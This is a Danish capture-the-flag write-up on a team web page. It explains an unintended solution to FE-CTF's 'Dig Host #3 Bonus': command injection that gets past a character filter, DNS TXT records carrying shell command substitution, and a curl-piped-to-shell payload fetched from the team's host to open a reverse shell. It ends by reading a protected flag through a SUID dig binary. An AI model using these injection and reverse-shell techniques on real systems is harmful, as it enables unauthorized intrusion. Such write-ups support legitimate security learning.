{% extends 'base.j2.html' %}

{% block content %}

<div id="indhold">
<h1>pyjam.as utiltænkt løsning til FE-CTF</h1>

<p>
Til <em>FE-CTF: Cyber Demon</em> fandt vi en utiltænkt løsning til
<em>Dig Host #3 Bonus</em>. Udfordringen var tænkt som en <em>reversing</em>
opgave, men det er vi så dårlige til, at vi måtte finde en anden vej.
</p>


<h2>Opgave</h2>

<p>
Man ved fra forrige opgave, at servicen er sårbar overfor <em>command
injection</em>. Der er et filter, der gør at man hverken kan indsætte
mellemrum, $-tegn eller bindestreger.
</p>

<p>
Vi <em>tror</em>, at den tiltænkte løsning var at læse det modificerede
<tt>dig</tt>-program ved command injection (f.eks. med <tt>;cat&lt;dig|base64</tt>),
<em>reverse engineer</em> den og finde en flag-funktion eller lignende.
Vores løsning virker også med et uændret <tt>dig</tt>-program.</p>

<p>
Hvadend man sender til servicen, bliver givet til <tt>{{"./dig <dit input>"}}</tt>.
Hvis man sender <tt>;ls</tt>, ser man at cwd indeholder:
</p>

<pre>
/dig [host]
bonus_flag
dig
dig_host_level3.php
flag
styles
</pre>

<p>
Hvis man prøver at læse <tt>bonus_flag</tt>, får man intet tilbage.
</p>


<h2>Command Injection med mellemrum</h2>

<p>
Vi startede vores jagt ved at forsøge at finde en måde at komme uden om
filteret. Særligt ville vi gerne sende mellemrum. Vi fandt ud af, at man kan
pipe resultatet fra <tt>./dig</tt> til <tt>/bin/sh</tt>. Hvis man f.eks. sender 
<tt>pyjam.as|/bin/sh</tt> bliver det til <tt>./dig pyjam.as|/bin/sh</tt>.
</p>

<p>
Det kan selvfølgelig ikke bruges til særligt meget, for resultatet fra
<tt>dig</tt> er ikke just et korrekt shell-program:
</p>

<pre>
; <<>> DiG 9.16.1-Ubuntu <<>> pyjam.as
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11511
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;pyjam.as.			IN	A

;; ANSWER SECTION:
pyjam.as.		60	IN	A	89.150.130.29

;; Query time: 107 msec
;; SERVER: 10.118.64.10#53(10.118.64.10)
;; WHEN: Sat Oct 29 19:31:55 UTC 2022
;; MSG SIZE  rcvd: 53
</pre>

<p>
Vi skal heldigvis kun have den første linje til at være gyldig, før <tt>/bin/sh</tt>
forsøger at eksekvere den. Ved at sætte mange A-records og pipe det gennem
<tt>tail</tt>, kan vi få et resultat hvor vi styrer den første linje, f.eks.
<tt>pyjam.as|tail|/bin/sh</tt>:
</p>

<pre>
pyjam.as.		60	IN	A	89.150.130.29
pyjam.as.		60	IN	A	89.150.130.29
pyjam.as.		60	IN	A	89.150.130.29
pyjam.as.		60	IN	A	89.150.130.29
pyjam.as.		60	IN	A	89.150.130.29

;; Query time: 2736 msec
;; SERVER: 192.168.0.1#53(192.168.0.1) (UDP)
;; WHEN: Sat Oct 29 13:27:20 CEST 2022
;; MSG SIZE  rcvd: 59
</pre>

<p>Som <tt>/bin/sh</tt> forsøger at eksekvere:</p>

<pre>
/bin/sh: 1: pyjam.as.: not found
/bin/sh: 2: pyjam.as.: not found
/bin/sh: 3: pyjam.as.: not found
/bin/sh: 4: pyjam.as.: not found
/bin/sh: 5: pyjam.as.: not found
/bin/sh: 7: Syntax error: ";;" unexpected
</pre>

<p>
Hvis vi kan sætte en TXT record med bash command substitution, så kan vi
eksekvere arbitrær kode!
</p>

<pre>
pyjam.as.		60	IN	TXT	"$(echo helloworld)"
</pre>

<p>
For at det skal virke, bliver vi nød til at bede om TXT-records, som man
normalt gør med <tt>dig TXT pyjam.as</tt>, og det kræver mellemrum... MEN! vi fandt
ud af at man kan få <tt>dig</tt> til at gøre det sådan her:
</p>

<pre>
{TXT,pyjam.as}|tail|/bin/sh
</pre>

<p>
Nu kan vi eksekvere kode uden filter, så mangler vi bare en måde at få
resultatet tilbage.
</p>


<h2>Reverse-shell</h2>

<p>
Vi kan bruge vores code injection med mellemrum til at lave en reverse shell.
Vi <strike>stjal</strike> <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python">
skrev en i python</a> og satte en masse TXT records:
</p>

<pre>
pyjam.as.		60	IN	TXT	"$(curl http://pyjam.as:1234/sploit | /bin/sh)"
</pre>

<p>Så lyttede vi på vores reverse shell</p>

<pre>
$ nc -lvp 1337
listening on [any] 1337 ...
</pre>

<p>Sendte vores payload afsted:</p>

<pre>
{TXT,pyjam.as}|tail|/bin/sh
</pre>

<p>Bum! Så fik vi en shell på serveren.</p>

<pre>
connect to [192.168.0.57] from 141.203.154.34.bc.googleusercontent.com [34.154.203.141] 2051
/bin/sh: 0: can't access tty; job control turned off
$ whoami
user
</pre>


<h2>Privilegie-eskalering</h2>

<p>
Nu kan vi køre <tt>ls -la</tt> og finde ud af, hvorfor vi ikke kunne læse <tt>bonus_flag</tt>:
</p>

<pre>
$ ls -la
total 844
drwxr-xr-x   1 nobody nogroup   4096 Oct 26 13:26 .
drwxr-xr-x   1 nobody nogroup   4096 Oct 26 13:26 ..
lrwxrwxrwx   1 nobody nogroup      7 Sep 22 16:47 bin -> usr/bin
-r--------   1 200000 nogroup     36 Oct 26 13:14 bonus_flag
drwxr-xr-x   2 nobody nogroup   4096 Apr 15  2020 boot
drwxr-xr-x   5 nobody nogroup    360 Oct 29 05:29 dev
-rwsr-xr-x   1 200000 user    789072 Oct 26 13:14 dig
...
</pre>

<p>
Vi kan se, at det kun er brugeren med UID "200000", som må læse <tt>bonus_flag</tt>.
</p>

<p>
Vi kan også se, at <tt>/dig</tt>-programmet er ejet af samme bruger, og har SUID bitten
sat, hvilket betyder at <tt>/dig</tt> må læse <tt>bonus_flag</tt>.
</p>

<p>
Med <tt>/dig -h</tt> lærte vi om <tt>-f</tt>-muligheden:
</p>

<pre>
                 -f filename         (batch mode)
</pre>

<p>
<tt>-f</tt>-muligheden gør at <tt>dig</tt> læser filen og forsøger at slå hver linje op i DNS, som lækker til stdout!
</p>

<pre>
$ ./dig {-f,bonus_flag}

; <<>> DiG 9.16.1-Ubuntu <<>> flag{wait, i thought this was web!}
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14415
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

...
</pre>

<p>
✨ Yay, <a href="https://pyjam.as/HA-G%C3%98H">så er der flag!</a><tt>flag{wait, i thought this was web!}</tt> ✨
<br>
</p>
</div>

<style>
#indhold {
    margin-left: 20%;
    margin-right: 20%;
    margin-bottom: 50px;
}

@media only screen and (max-width: 768px) {
  /* For mobile phones: */
  #indhold {
    margin-left: 5%;
    margin-right: 5%;
  }
}

a {
  color: rgb(217, 255, 0);
}

pre {
  margin-top: 15px;
  margin-bottom: 15px;
  background-color: #202020;
  border-radius: 5px;
}

p {
  line-height: 28px;
}

h1 {
    font-size: 2.5em;
    margin-bottom: 10px;
    margin-top: 15px;
}

h2 {
    font-size: 2em;
    margin-bottom: 10px;
    margin-top: 15px;
}
tt {
  color: rgb(217, 255, 0);
  filter: brightness(70%);
  padding: 5px;
  border-radius: 5px;
  background-color: #202020;
}

</style>

{% endblock %}
